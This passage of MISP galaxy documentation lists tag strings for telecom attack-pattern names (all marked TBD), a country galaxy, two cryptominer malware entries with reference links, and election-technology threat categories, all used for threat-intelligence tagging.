The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit via Charging Station or PC"

Exploit via Radio Interfaces

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit via Radio Interfaces"

Rogue Cellular Base Station

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Rogue Cellular Base Station"

Insider attacks and human errors

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Insider attacks and human errors"

Trusted Relationship

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Trusted Relationship"

Supply Chain Compromise

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Supply Chain Compromise"

Native Code

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Native Code"

Scheduled Task/Job

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Scheduled Task/Job"

Command-Line Interface

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Command-Line Interface"

Command and Scripting Interpreter

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Command and Scripting Interpreter"

Boot or Logon Autostart Execution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Boot or Logon Autostart Execution"

Foreground Persistence

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Foreground Persistence"

Modify Cached Executable Code

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Cached Executable Code"

Compromise Application Executable

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Application Executable"

Modify OS Kernel or Boot Partition

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify OS Kernel or Boot Partition"

Event Triggered Execution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Event Triggered Execution"

Spoofed radio network

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Spoofed radio network"

Infecting network nodes

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Infecting network nodes"

Code Injection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Code Injection"

Process Injection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Process Injection"

Masquerading

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Masquerading"

Disguise Root/Jailbreak Indicators

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Disguise Root/Jailbreak Indicators"

Evade Analysis Environment

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Evade Analysis Environment"

Modify Trusted Execution Environment

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Trusted Execution Environment"

Obfuscated Files or Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Obfuscated Files or Information"

Suppress Application Icon

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Suppress Application Icon"

Uninstall Malicious Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Uninstall Malicious Application"

Install Insecure or Malicious Configuration

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Install Insecure or Malicious Configuration"

Geofencing

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Geofencing"

Shutdown Remote Device

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Shutdown Remote Device"

Exploitation for Defense Evasion

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploitation for Defense Evasion"

Security Audit Camouflage

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Security Audit Camouflage"

Overload Avoidance

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Overload Avoidance"

Traffic Distribution

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Traffic Distribution"

URI Hijacking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="URI Hijacking"

Modify Authentication Process

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Modify Authentication Process"

Forced Authentication

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Forced Authentication"

System Network Connections Discovery

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="System Network Connections Discovery"

UE knocking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="UE knocking"

Internal Resource Search

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Internal Resource Search"

Network Sniffing

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Sniffing"

Abusing Inter-working Functionalities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Abusing Inter-working Functionalities"

Replication Through SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through SMS"

Replication Through Bluetooth

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through Bluetooth"

Replication Through WLAN

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through WLAN"

Replication Through IP

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Replication Through IP"

Exploit platform & service specific vulnerabilites

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit platform & service specific vulnerabilites"

Access Sensitive Data in Device Logs

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Access Sensitive Data in Device Logs"

Network Traffic Capture or Redirection

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Traffic Capture or Redirection"

Network-specific identifiers

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network-specific identifiers"

Network-specific data

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network-specific data"

Application Layer Protocol

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Application Layer Protocol"

Communication via SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via SMS"

Communication via Bluetooth

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via Bluetooth"

Communication via WLAN

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Communication via WLAN"

Exploit SS7 to Redirect Phone Calls/SMS

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS"

Exploit SS7 to Track Device Location

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit SS7 to Track Device Location"

SS7-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SS7-based attacks"

Diameter-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Diameter-based attacks"

GTP-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="GTP-based attacks"

NAS-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="NAS-based attacks"

MEC-based attacks

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="MEC-based attacks"

Network Slice

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Slice"

Automated Exfiltration

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Automated Exfiltration"

Data Encrypted

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Data Encrypted"

Alternate Network Mediums

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Alternate Network Mediums"

Data Manipulation

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Data Manipulation"

Endpoint Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Endpoint Denial of Service"

Carrier Billing Fraud

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Carrier Billing Fraud"

SMS Fraud

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SMS Fraud"

Manipulate Device Communication

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Manipulate Device Communication"

Jamming or Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Jamming or Denial of Service"

Location Tracking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Location Tracking"

Identity Exploit

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Identity Exploit"

Network Denial of Service

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Network Denial of Service"

Resource Hijacking

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Resource Hijacking"

SLA Breach

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="SLA Breach"

Customer Churn

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Customer Churn"

Country

Country meta information based on the database provided by geonames.org..

Country is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: geonames.org

andorra

Andorra

The tag is: misp-galaxy:country="andorra"

united arab emirates

United Arab Emirates

The tag is: misp-galaxy:country="united arab emirates"

afghanistan

Afghanistan

The tag is: misp-galaxy:country="afghanistan"

antigua and barbuda

Antigua and Barbuda

The tag is: misp-galaxy:country="antigua and barbuda"

anguilla

Anguilla

The tag is: misp-galaxy:country="anguilla"

albania

Albania

The tag is: misp-galaxy:country="albania"

armenia

Armenia

The tag is: misp-galaxy:country="armenia"

angola

Angola

The tag is: misp-galaxy:country="angola"

antarctica

Antarctica

The tag is: misp-galaxy:country="antarctica"

argentina

Argentina

The tag is: misp-galaxy:country="argentina"

american samoa

American Samoa

The tag is: misp-galaxy:country="american samoa"

austria

Austria

The tag is: misp-galaxy:country="austria"

australia

Australia

The tag is: misp-galaxy:country="australia"

aruba

Aruba

The tag is: misp-galaxy:country="aruba"

aland islands

Aland Islands

The tag is: misp-galaxy:country="aland islands"

azerbaijan

Azerbaijan

The tag is: misp-galaxy:country="azerbaijan"

bosnia and herzegovina

Bosnia and Herzegovina

The tag is: misp-galaxy:country="bosnia and herzegovina"

barbados

Barbados

The tag is: misp-galaxy:country="barbados"

bangladesh

Bangladesh

The tag is: misp-galaxy:country="bangladesh"

belgium

Belgium

The tag is: misp-galaxy:country="belgium"

burkina faso

Burkina Faso

The tag is: misp-galaxy:country="burkina faso"

bulgaria

Bulgaria

The tag is: misp-galaxy:country="bulgaria"

bahrain

Bahrain

The tag is: misp-galaxy:country="bahrain"

burundi

Burundi

The tag is: misp-galaxy:country="burundi"

benin

Benin

The tag is: misp-galaxy:country="benin"

saint barthelemy

Saint Barthelemy

The tag is: misp-galaxy:country="saint barthelemy"

bermuda

Bermuda

The tag is: misp-galaxy:country="bermuda"

brunei

Brunei

The tag is: misp-galaxy:country="brunei"

bolivia

Bolivia

The tag is: misp-galaxy:country="bolivia"

bonaire, saint eustatius and saba

Bonaire, Saint Eustatius and Saba

The tag is: misp-galaxy:country="bonaire, saint eustatius and saba "

brazil

Brazil

The tag is: misp-galaxy:country="brazil"

bahamas

Bahamas

The tag is: misp-galaxy:country="bahamas"

bhutan

Bhutan

The tag is: misp-galaxy:country="bhutan"

bouvet island

Bouvet Island

The tag is: misp-galaxy:country="bouvet island"

botswana

Botswana

The tag is: misp-galaxy:country="botswana"

belarus

Belarus

The tag is: misp-galaxy:country="belarus"

belize

Belize

The tag is: misp-galaxy:country="belize"

canada

Canada

The tag is: misp-galaxy:country="canada"

cocos islands

Cocos Islands

The tag is: misp-galaxy:country="cocos islands"

democratic republic of the congo

Democratic Republic of the Congo

The tag is: misp-galaxy:country="democratic republic of the congo"

central african republic

Central African Republic

The tag is: misp-galaxy:country="central african republic"

republic of the congo

Republic of the Congo

The tag is: misp-galaxy:country="republic of the congo"

switzerland

Switzerland

The tag is: misp-galaxy:country="switzerland"

ivory coast

Ivory Coast

The tag is: misp-galaxy:country="ivory coast"

cook islands

Cook Islands

The tag is: misp-galaxy:country="cook islands"

chile

Chile

The tag is: misp-galaxy:country="chile"

cameroon

Cameroon

The tag is: misp-galaxy:country="cameroon"

china

China

The tag is: misp-galaxy:country="china"

colombia

Colombia

The tag is: misp-galaxy:country="colombia"

costa rica

Costa Rica

The tag is: misp-galaxy:country="costa rica"

cuba

Cuba

The tag is: misp-galaxy:country="cuba"

cabo verde

Cabo Verde

The tag is: misp-galaxy:country="cabo verde"

curacao

Curacao

The tag is: misp-galaxy:country="curacao"

christmas island

Christmas Island

The tag is: misp-galaxy:country="christmas island"

cyprus

Cyprus

The tag is: misp-galaxy:country="cyprus"

czechia

Czechia

The tag is: misp-galaxy:country="czechia"

germany

Germany

The tag is: misp-galaxy:country="germany"

djibouti

Djibouti

The tag is: misp-galaxy:country="djibouti"

denmark

Denmark

The tag is: misp-galaxy:country="denmark"

dominica

Dominica

The tag is: misp-galaxy:country="dominica"

dominican republic

Dominican Republic

The tag is: misp-galaxy:country="dominican republic"

algeria

Algeria

The tag is: misp-galaxy:country="algeria"

ecuador

Ecuador

The tag is: misp-galaxy:country="ecuador"

estonia

Estonia

The tag is: misp-galaxy:country="estonia"

egypt

Egypt

The tag is: misp-galaxy:country="egypt"

western sahara

Western Sahara

The tag is: misp-galaxy:country="western sahara"

eritrea

Eritrea

The tag is: misp-galaxy:country="eritrea"

spain

Spain

The tag is: misp-galaxy:country="spain"

ethiopia

Ethiopia

The tag is: misp-galaxy:country="ethiopia"

finland

Finland

The tag is: misp-galaxy:country="finland"

fiji

Fiji

The tag is: misp-galaxy:country="fiji"

falkland islands

Falkland Islands

The tag is: misp-galaxy:country="falkland islands"

micronesia

Micronesia

The tag is: misp-galaxy:country="micronesia"

faroe islands

Faroe Islands

The tag is: misp-galaxy:country="faroe islands"

france

France

The tag is: misp-galaxy:country="france"

gabon

Gabon

The tag is: misp-galaxy:country="gabon"

united kingdom

United Kingdom

The tag is: misp-galaxy:country="united kingdom"

grenada

Grenada

The tag is: misp-galaxy:country="grenada"

georgia

Georgia

The tag is: misp-galaxy:country="georgia"

french guiana

French Guiana

The tag is: misp-galaxy:country="french guiana"

guernsey

Guernsey

The tag is: misp-galaxy:country="guernsey"

ghana

Ghana

The tag is: misp-galaxy:country="ghana"

gibraltar

Gibraltar

The tag is: misp-galaxy:country="gibraltar"

greenland

Greenland

The tag is: misp-galaxy:country="greenland"

gambia

Gambia

The tag is: misp-galaxy:country="gambia"

guinea

Guinea

The tag is: misp-galaxy:country="guinea"

guadeloupe

Guadeloupe

The tag is: misp-galaxy:country="guadeloupe"

equatorial guinea

Equatorial Guinea

The tag is: misp-galaxy:country="equatorial guinea"

greece

Greece

The tag is: misp-galaxy:country="greece"

south georgia and the south sandwich islands

South Georgia and the South Sandwich Islands

The tag is: misp-galaxy:country="south georgia and the south sandwich islands"

guatemala

Guatemala

The tag is: misp-galaxy:country="guatemala"

guam

Guam

The tag is: misp-galaxy:country="guam"

guinea-bissau

Guinea-Bissau

The tag is: misp-galaxy:country="guinea-bissau"

guyana

Guyana

The tag is: misp-galaxy:country="guyana"

hong kong

Hong Kong

The tag is: misp-galaxy:country="hong kong"

heard island and mcdonald islands

Heard Island and McDonald Islands

The tag is: misp-galaxy:country="heard island and mcdonald islands"

honduras

Honduras

The tag is: misp-galaxy:country="honduras"

croatia

Croatia

The tag is: misp-galaxy:country="croatia"

haiti

Haiti

The tag is: misp-galaxy:country="haiti"

hungary

Hungary

The tag is: misp-galaxy:country="hungary"

indonesia

Indonesia

The tag is: misp-galaxy:country="indonesia"

ireland

Ireland

The tag is: misp-galaxy:country="ireland"

israel

Israel

The tag is: misp-galaxy:country="israel"

isle of man

Isle of Man

The tag is: misp-galaxy:country="isle of man"

india

India

The tag is: misp-galaxy:country="india"

british indian ocean territory

British Indian Ocean Territory

The tag is: misp-galaxy:country="british indian ocean territory"

iraq

Iraq

The tag is: misp-galaxy:country="iraq"

iran

Iran

The tag is: misp-galaxy:country="iran"

iceland

Iceland

The tag is: misp-galaxy:country="iceland"

italy

Italy

The tag is: misp-galaxy:country="italy"

jersey

Jersey

The tag is: misp-galaxy:country="jersey"

jamaica

Jamaica

The tag is: misp-galaxy:country="jamaica"

jordan

Jordan

The tag is: misp-galaxy:country="jordan"

japan

Japan

The tag is: misp-galaxy:country="japan"

kenya

Kenya

The tag is: misp-galaxy:country="kenya"

kyrgyzstan

Kyrgyzstan

The tag is: misp-galaxy:country="kyrgyzstan"

cambodia

Cambodia

The tag is: misp-galaxy:country="cambodia"

kiribati

Kiribati

The tag is: misp-galaxy:country="kiribati"

comoros

Comoros

The tag is: misp-galaxy:country="comoros"

saint kitts and nevis

Saint Kitts and Nevis

The tag is: misp-galaxy:country="saint kitts and nevis"

north korea

North Korea

The tag is: misp-galaxy:country="north korea"

south korea

South Korea

The tag is: misp-galaxy:country="south korea"

kosovo

Kosovo

The tag is: misp-galaxy:country="kosovo"

kuwait

Kuwait

The tag is: misp-galaxy:country="kuwait"

cayman islands

Cayman Islands

The tag is: misp-galaxy:country="cayman islands"

kazakhstan

Kazakhstan

The tag is: misp-galaxy:country="kazakhstan"

laos

Laos

The tag is: misp-galaxy:country="laos"

lebanon

Lebanon

The tag is: misp-galaxy:country="lebanon"

saint lucia

Saint Lucia

The tag is: misp-galaxy:country="saint lucia"

liechtenstein

Liechtenstein

The tag is: misp-galaxy:country="liechtenstein"

sri lanka

Sri Lanka

The tag is: misp-galaxy:country="sri lanka"

liberia

Liberia

The tag is: misp-galaxy:country="liberia"

lesotho

Lesotho

The tag is: misp-galaxy:country="lesotho"

lithuania

Lithuania

The tag is: misp-galaxy:country="lithuania"

luxembourg

Luxembourg

The tag is: misp-galaxy:country="luxembourg"

latvia

Latvia

The tag is: misp-galaxy:country="latvia"

libya

Libya

The tag is: misp-galaxy:country="libya"

morocco

Morocco

The tag is: misp-galaxy:country="morocco"

monaco

Monaco

The tag is: misp-galaxy:country="monaco"

moldova

Moldova

The tag is: misp-galaxy:country="moldova"

montenegro

Montenegro

The tag is: misp-galaxy:country="montenegro"

saint martin

Saint Martin

The tag is: misp-galaxy:country="saint martin"

madagascar

Madagascar

The tag is: misp-galaxy:country="madagascar"

marshall islands

Marshall Islands

The tag is: misp-galaxy:country="marshall islands"

north macedonia

North Macedonia

The tag is: misp-galaxy:country="north macedonia"

mali

Mali

The tag is: misp-galaxy:country="mali"

myanmar

Myanmar

The tag is: misp-galaxy:country="myanmar"

mongolia

Mongolia

The tag is: misp-galaxy:country="mongolia"

macao

Macao

The tag is: misp-galaxy:country="macao"

northern mariana islands

Northern Mariana Islands

The tag is: misp-galaxy:country="northern mariana islands"

martinique

Martinique

The tag is: misp-galaxy:country="martinique"

mauritania

Mauritania

The tag is: misp-galaxy:country="mauritania"

montserrat

Montserrat

The tag is: misp-galaxy:country="montserrat"

malta

Malta

The tag is: misp-galaxy:country="malta"

mauritius

Mauritius

The tag is: misp-galaxy:country="mauritius"

maldives

Maldives

The tag is: misp-galaxy:country="maldives"

malawi

Malawi

The tag is: misp-galaxy:country="malawi"

mexico

Mexico

The tag is: misp-galaxy:country="mexico"

malaysia

Malaysia

The tag is: misp-galaxy:country="malaysia"

mozambique

Mozambique

The tag is: misp-galaxy:country="mozambique"

namibia

Namibia

The tag is: misp-galaxy:country="namibia"

new caledonia

New Caledonia

The tag is: misp-galaxy:country="new caledonia"

niger

Niger

The tag is: misp-galaxy:country="niger"

norfolk island

Norfolk Island

The tag is: misp-galaxy:country="norfolk island"

nigeria

Nigeria

The tag is: misp-galaxy:country="nigeria"

nicaragua

Nicaragua

The tag is: misp-galaxy:country="nicaragua"

netherlands

Netherlands

The tag is: misp-galaxy:country="netherlands"

norway

Norway

The tag is: misp-galaxy:country="norway"

nepal

Nepal

The tag is: misp-galaxy:country="nepal"

nauru

Nauru

The tag is: misp-galaxy:country="nauru"

niue

Niue

The tag is: misp-galaxy:country="niue"

new zealand

New Zealand

The tag is: misp-galaxy:country="new zealand"

oman

Oman

The tag is: misp-galaxy:country="oman"

panama

Panama

The tag is: misp-galaxy:country="panama"

peru

Peru

The tag is: misp-galaxy:country="peru"

french polynesia

French Polynesia

The tag is: misp-galaxy:country="french polynesia"

papua new guinea

Papua New Guinea

The tag is: misp-galaxy:country="papua new guinea"

philippines

Philippines

The tag is: misp-galaxy:country="philippines"

pakistan

Pakistan

The tag is: misp-galaxy:country="pakistan"

poland

Poland

The tag is: misp-galaxy:country="poland"

saint pierre and miquelon

Saint Pierre and Miquelon

The tag is: misp-galaxy:country="saint pierre and miquelon"

pitcairn

Pitcairn

The tag is: misp-galaxy:country="pitcairn"

puerto rico

Puerto Rico

The tag is: misp-galaxy:country="puerto rico"

palestinian territory

Palestinian Territory

The tag is: misp-galaxy:country="palestinian territory"

portugal

Portugal

The tag is: misp-galaxy:country="portugal"

palau

Palau

The tag is: misp-galaxy:country="palau"

paraguay

Paraguay

The tag is: misp-galaxy:country="paraguay"

qatar

Qatar

The tag is: misp-galaxy:country="qatar"

reunion

Reunion

The tag is: misp-galaxy:country="reunion"

romania

Romania

The tag is: misp-galaxy:country="romania"

serbia

Serbia

The tag is: misp-galaxy:country="serbia"

russia

Russia

The tag is: misp-galaxy:country="russia"

rwanda

Rwanda

The tag is: misp-galaxy:country="rwanda"

saudi arabia

Saudi Arabia

The tag is: misp-galaxy:country="saudi arabia"

solomon islands

Solomon Islands

The tag is: misp-galaxy:country="solomon islands"

seychelles

Seychelles

The tag is: misp-galaxy:country="seychelles"

sudan

Sudan

The tag is: misp-galaxy:country="sudan"

south sudan

South Sudan

The tag is: misp-galaxy:country="south sudan"

sweden

Sweden

The tag is: misp-galaxy:country="sweden"

singapore

Singapore

The tag is: misp-galaxy:country="singapore"

saint helena

Saint Helena

The tag is: misp-galaxy:country="saint helena"

slovenia

Slovenia

The tag is: misp-galaxy:country="slovenia"

svalbard and jan mayen

Svalbard and Jan Mayen

The tag is: misp-galaxy:country="svalbard and jan mayen"

slovakia

Slovakia

The tag is: misp-galaxy:country="slovakia"

sierra leone

Sierra Leone

The tag is: misp-galaxy:country="sierra leone"

san marino

San Marino

The tag is: misp-galaxy:country="san marino"

senegal

Senegal

The tag is: misp-galaxy:country="senegal"

somalia

Somalia

The tag is: misp-galaxy:country="somalia"

suriname

Suriname

The tag is: misp-galaxy:country="suriname"

sao tome and principe

Sao Tome and Principe

The tag is: misp-galaxy:country="sao tome and principe"

el salvador

El Salvador

The tag is: misp-galaxy:country="el salvador"

sint maarten

Sint Maarten

The tag is: misp-galaxy:country="sint maarten"

syria

Syria

The tag is: misp-galaxy:country="syria"

eswatini

Eswatini

The tag is: misp-galaxy:country="eswatini"

turks and caicos islands

Turks and Caicos Islands

The tag is: misp-galaxy:country="turks and caicos islands"

chad

Chad

The tag is: misp-galaxy:country="chad"

french southern territories

French Southern Territories

The tag is: misp-galaxy:country="french southern territories"

togo

Togo

The tag is: misp-galaxy:country="togo"

thailand

Thailand

The tag is: misp-galaxy:country="thailand"

tajikistan

Tajikistan

The tag is: misp-galaxy:country="tajikistan"

tokelau

Tokelau

The tag is: misp-galaxy:country="tokelau"

timor leste

Timor Leste

The tag is: misp-galaxy:country="timor leste"

turkmenistan

Turkmenistan

The tag is: misp-galaxy:country="turkmenistan"

tunisia

Tunisia

The tag is: misp-galaxy:country="tunisia"

tonga

Tonga

The tag is: misp-galaxy:country="tonga"

turkey

Turkey

The tag is: misp-galaxy:country="turkey"

trinidad and tobago

Trinidad and Tobago

The tag is: misp-galaxy:country="trinidad and tobago"

tuvalu

Tuvalu

The tag is: misp-galaxy:country="tuvalu"

taiwan

Taiwan

The tag is: misp-galaxy:country="taiwan"

tanzania

Tanzania

The tag is: misp-galaxy:country="tanzania"

ukraine

Ukraine

The tag is: misp-galaxy:country="ukraine"

uganda

Uganda

The tag is: misp-galaxy:country="uganda"

united states minor outlying islands

United States Minor Outlying Islands

The tag is: misp-galaxy:country="united states minor outlying islands"

united states

United States

The tag is: misp-galaxy:country="united states"

uruguay

Uruguay

The tag is: misp-galaxy:country="uruguay"

uzbekistan

Uzbekistan

The tag is: misp-galaxy:country="uzbekistan"

vatican

Vatican

The tag is: misp-galaxy:country="vatican"

saint vincent and the grenadines

Saint Vincent and the Grenadines

The tag is: misp-galaxy:country="saint vincent and the grenadines"

venezuela

Venezuela

The tag is: misp-galaxy:country="venezuela"

british virgin islands

British Virgin Islands

The tag is: misp-galaxy:country="british virgin islands"

u.s. virgin islands

U.S. Virgin Islands

The tag is: misp-galaxy:country="u.s. virgin islands"

vietnam

Vietnam

The tag is: misp-galaxy:country="vietnam"

vanuatu

Vanuatu

The tag is: misp-galaxy:country="vanuatu"

wallis and futuna

Wallis and Futuna

The tag is: misp-galaxy:country="wallis and futuna"

samoa

Samoa

The tag is: misp-galaxy:country="samoa"

yemen

Yemen

The tag is: misp-galaxy:country="yemen"

mayotte

Mayotte

The tag is: misp-galaxy:country="mayotte"

south africa

South Africa

The tag is: misp-galaxy:country="south africa"

zambia

Zambia

The tag is: misp-galaxy:country="zambia"

zimbabwe

Zimbabwe

The tag is: misp-galaxy:country="zimbabwe"

serbia and montenegro

Serbia and Montenegro

The tag is: misp-galaxy:country="serbia and montenegro"

netherlands antilles

Netherlands Antilles

The tag is: misp-galaxy:country="netherlands antilles"

Cryptominers

A list of cryptominer and cryptojacker malware..

Cryptominers is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Cisco Talos - raw-data

Lemon Duck

The infection starts with a PowerShell loading script, which is copied from other infected systems via SMB, email or external USB drives. The actor also employs several exploits for vulnerabilities such as SMBGhost and Eternal Blue.

The tag is: misp-galaxy:cryptominers="Lemon Duck"

Lemon Duck is also known as:

Table 718. Table References
Links
https://blog.talosintelligence.com/2020/10/lemon-duck-brings-cryptocurrency-miners.html
https://success.trendmicro.com/solution/000261916
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/spam/3697/spammers-use-covid19-to-spread-lemon-duck-cryptominer
https://cyberflorida.org/threat-advisory/lemon-duck-cryptominer/

WannaMine

WannaMine is a cryptojacker that takes advantage of EternalBlue.

The tag is: misp-galaxy:cryptominers="WannaMine"

WannaMine is also known as:

Table 719. Table References
Links
https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/?utm_campaign=dsa&utm_content=us&utm_medium=sem&utm_source=goog&utm_term=&gclid=EAIaIQobChMIjrayysrX7AIVFUWGCh3sQApKEAAYASAAEgIE6_D_BwE
https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/
https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry

Election guidelines

Universal Development and Security Guidelines as Applicable to Election Technology..

Election guidelines is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: NIS Cooperation Group

Tampering with registrations

The tag is: misp-galaxy:guidelines="Tampering with registrations"

Table 720. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of party/campaign registration, causing them to miss the deadline

The tag is: misp-galaxy:guidelines="DoS or overload of party/campaign registration, causing them to miss the deadline"

Table 721. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Fabricated signatures from sponsor

The tag is: misp-galaxy:guidelines="Fabricated signatures from sponsor"

Table 722. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Identity fraud during voter registration

The tag is: misp-galaxy:guidelines="Identity fraud during voter registration"

Table 723. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Deleting or tampering with voter data

The tag is: misp-galaxy:guidelines="Deleting or tampering with voter data"

Table 724. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of voter registration system, suppressing voters

The tag is: misp-galaxy:guidelines="DoS or overload of voter registration system, suppressing voters"

Table 725. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking candidate laptops or email accounts

The tag is: misp-galaxy:guidelines="Hacking candidate laptops or email accounts"

Table 726. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking campaign websites (defacement, DoS)

The tag is: misp-galaxy:guidelines="Hacking campaign websites (defacement, DoS)"

Table 727. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Misconfiguration of a website

The tag is: misp-galaxy:guidelines="Misconfiguration of a website"

Table 728. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Leak of confidential information

The tag is: misp-galaxy:guidelines="Leak of confidential information"

Table 729. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking/misconfiguration of government servers, communication networks, or endpoints

The tag is: misp-galaxy:guidelines="Hacking/misconfiguration of government servers, communication networks, or endpoints"

Table 730. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results

Hacking government websites, spreading misinformation on the election process, registered parties/candidates, or results

The tag is: misp-galaxy:guidelines="Hacking campaign websites, spreading misinformation on the election process, registered parties/candidates, or results"

Table 731. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

DoS or overload of government websites

The tag is: misp-galaxy:guidelines="DoS or overload of government websites"

Table 732. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering or DoS of voting and/or vote confidentiality during or after the elections

The tag is: misp-galaxy:guidelines="Tampering or DoS of voting and/or vote confidentiality during or after the elections"

Table 733. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Software bug altering results

The tag is: misp-galaxy:guidelines="Software bug altering results"

Table 734. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Tampering with logs/journals

The tag is: misp-galaxy:guidelines="Tampering with logs/journals"

Table 735. Table References
Links
https://www.ria.ee/sites/default/files/content-editors/kuberturve/cyber_security_of_election_technology.pdf

Breach of voters privacy during the casting of votes

The tag is: misp-galaxy:guidelines="Breach of voters privacy during the casting of votes"

Table 736. Table References
Links
